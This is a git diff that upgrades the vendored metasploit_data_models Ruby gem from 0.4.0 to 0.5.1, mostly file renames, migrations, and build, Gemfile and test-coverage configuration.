lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb create mode 100755 
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000003_expand_details2.rb 
create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/mdm.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/mdm/host/operating_system_normalization.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/base64_serializer.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/engine.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/serialized_prefs.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/validators/ip_format_validator.rb (100%) rename 
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/lib/metasploit_data_models/validators/password_is_strong_validator.rb (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/metasploit_data_models.gemspec (88%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/script/rails (100%) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/Rakefile (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/assets/javascripts/application.js (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/assets/stylesheets/application.css (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/controllers/application_controller.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/helpers/application_helper.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/mailers/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/models/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/views/layouts/application.html.erb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => 
metasploit_data_models-0.5.1}/spec/dummy/config.ru (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/application.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/boot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/database.yml.example (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environment.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environments/development.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environments/production.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environments/test.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/backtrace_silencers.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/inflections.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/mime_types.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/secret_token.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/session_store.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/wrap_parameters.rb (100%) rename 
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/routes.rb (100%) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/lib/assets/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/log/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/404.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/422.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/500.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/favicon.ico (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/script/rails (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/lib/base64_serializer_spec.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/spec_helper.rb (96%) rename lib/gemcache/ruby/1.9.1/specifications/{metasploit_data_models-0.3.0.gemspec => metasploit_data_models-0.5.1.gemspec} (72%) diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile deleted file mode 100755 index b72e01d066..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile +++ /dev/null 
@@ -1,10 +0,0 @@
-source "http://rubygems.org"
-
-# Specify your gem's dependencies in metasploit_data_models.gemspec
-gemspec
-
-group :test do
- # rails is only used for testing with a dummy application in spec/dummy
- gem 'rails'
- gem 'rspec-rails'
-end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile
deleted file mode 100755
index ccea92f08e..0000000000
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile
+++ /dev/null
@@ -1,7 +0,0 @@
-require 'bundler/gem_tasks'
-require 'rspec/core/rake_task'
-
-RSpec::Core::RakeTask.new(:spec)
-
-task :default => :spec
-
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb
deleted file mode 100755
index 3d938d3ef9..0000000000
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb
+++ /dev/null
@@ -1,16 +0,0 @@
-class Mdm::WebVuln < ActiveRecord::Base
- #
- # Relations
- #
-
- belongs_to :web_site, :class_name => 'Mdm::WebSite'
-
- #
- # Serializations
- #
-
- serialize :params, MetasploitDataModels::Base64Serializer.new
-
- ActiveSupport.run_load_hooks(:mdm_web_vuln, self)
-end
-
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb
deleted file mode 100755
index cf7d89cc68..0000000000
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb
+++ /dev/null
@@ -1,7 +0,0 @@
-module MetasploitDataModels
- # MetasploitDataModels follows the {Semantic Versioning Specification http://semver.org/}. At this time, the API
- # is considered unstable because the database migrations are still in metasploit-framework and certain models may not
- # be shared between metasploit-framework and pro, so models may be removed in the future. Because of the unstable API
- # the version should remain below 1.0.0
- VERSION = '0.4.0'
-end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore
similarity index 78%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore
index e5b2a024e4..9cf3f2824c 100755
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore
@@ -6,13 +6,19 @@
 *.gem
 # Rubymine project configuration
 .idea
+# logs
+*.log
 # Don't check in rvmrc since this is a gem
 .rvmrc
+# YARD database
+.yardoc
+# coverage report directory for simplecov/Rubymine
+coverage
+# generated yardocs
+doc
 # Installed gem versions. Not stored for the same reasons as .rvmrc
 Gemfile.lock
 # Packaging directory for builds
 pkg/*
 # Database configuration (with passwords) for specs
 spec/dummy/config/database.yml
-# logs
-*.log
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.rspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.rspec
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.rspec
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.rspec
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov
new file mode 100644
index 0000000000..c46d9aaf94
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov
@@ -0,0 +1,38 @@
+# RM_INFO is set when using Rubymine. In Rubymine, starting SimpleCov is
+# controlled by running with coverage, so don't explicitly start coverage (and
+# therefore generate a report) when in Rubymine. This _will_ generate a report
+# whenever `rake spec` is run.
+unless ENV['RM_INFO']
+ SimpleCov.start
+end
+
+SimpleCov.configure do
+ load_adapter('rails')
+
+ # ignore this file
+ add_filter '.simplecov'
+
+ #
+ # Changed Files in Git Group
+ # @see http://fredwu.me/post/35625566267/simplecov-test-coverage-for-changed-files-only
+ #
+
+ untracked = `git ls-files --exclude-standard --others`
+ unstaged = `git diff --name-only`
+ staged = `git diff --name-only --cached`
+ all = untracked + unstaged + staged
+ changed_filenames = all.split("\n")
+
+ add_group 'Changed' do |source_file|
+ changed_filenames.detect { |changed_filename|
+ source_file.filename.end_with?(changed_filename)
+ }
+ end
+
+ #
+ # Specs are reported on to ensure that all examples are being run and all
+ # lets, befores, afters, etc are being used.
+ #
+
+ add_group 'Specs', 'spec'
+end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts
new file mode 100644
index 0000000000..5d51dac244
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts
@@ -0,0 +1,4 @@
+--markup markdown
+--protected
+{app,lib}/**/*.rb
+db/migrate/*.rb
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile
new file mode 100755
index 0000000000..c4e6b487cb
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile
@@ -0,0 +1,22 @@
+source "http://rubygems.org"
+
+# Specify your gem's dependencies in metasploit_data_models.gemspec
+gemspec
+
+# used by dummy application
+group :development, :test do
+ # supplies factories for producing model instance for specs
+ gem 'factory_girl_rails'
+ # rails is only used for the dummy application in spec/dummy
+ gem 'rails'
+end
+
+group :test do
+ # In a full rails project, factory_girl_rails would be in both the :development, and :test group, but since we only
+ # want rails in :test, factory_girl_rails must also only be in :test.
+ # add matchers from shoulda, such as validates_presence_of, which are useful for testing validations
+ gem 'shoulda-matchers'
+ # code coverage of tests
+ gem 'simplecov', :require => false
+ gem 'rspec-rails'
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/LICENSE
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/LICENSE
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/README.md b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/README.md
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/README.md
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/README.md
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile
new file mode 100755
index 0000000000..b582299d61
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile
@@ -0,0 +1,20 @@
+#!/usr/bin/env rake
+begin
+ require 'bundler/setup'
+rescue LoadError
+ puts 'You must `gem install bundler` and `bundle install` to run rake tasks'
+end
+
+
+APP_RAKEFILE = File.expand_path('../spec/dummy/Rakefile', __FILE__)
+load 'rails/tasks/engine.rake'
+
+Bundler::GemHelper.install_tasks
+
+require 'rspec/core/rake_task'
+
+RSpec::Core::RakeTask.new(:spec)
+task :default => :spec
+
+load 'lib/tasks/yard.rake'
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/api_key.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/api_key.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/api_key.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/api_key.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/client.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/client.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/client.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/client.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/cred.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/cred.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/cred.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/event.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/event.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/event.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploit_attempt.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploit_attempt.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploit_attempt.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploited_host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploited_host.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploited_host.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploited_host.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_tag.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_tag.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_tag.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/imported_cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/imported_cred.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/imported_cred.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/imported_cred.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/listener.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/listener.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/listener.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/listener.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/loot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/loot.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/loot.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/loot.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/macro.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/macro.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/macro.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/macro.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/mod_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/mod_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/mod_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/mod_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_action.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_action.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_action.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_arch.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_arch.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_arch.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_author.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_author.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_author.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_mixin.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_mixin.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_mixin.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_platform.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_platform.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_platform.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_target.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_target.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_target.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/nexpose_console.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/nexpose_console.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/nexpose_console.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/nexpose_console.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/note.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/note.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/note.rb
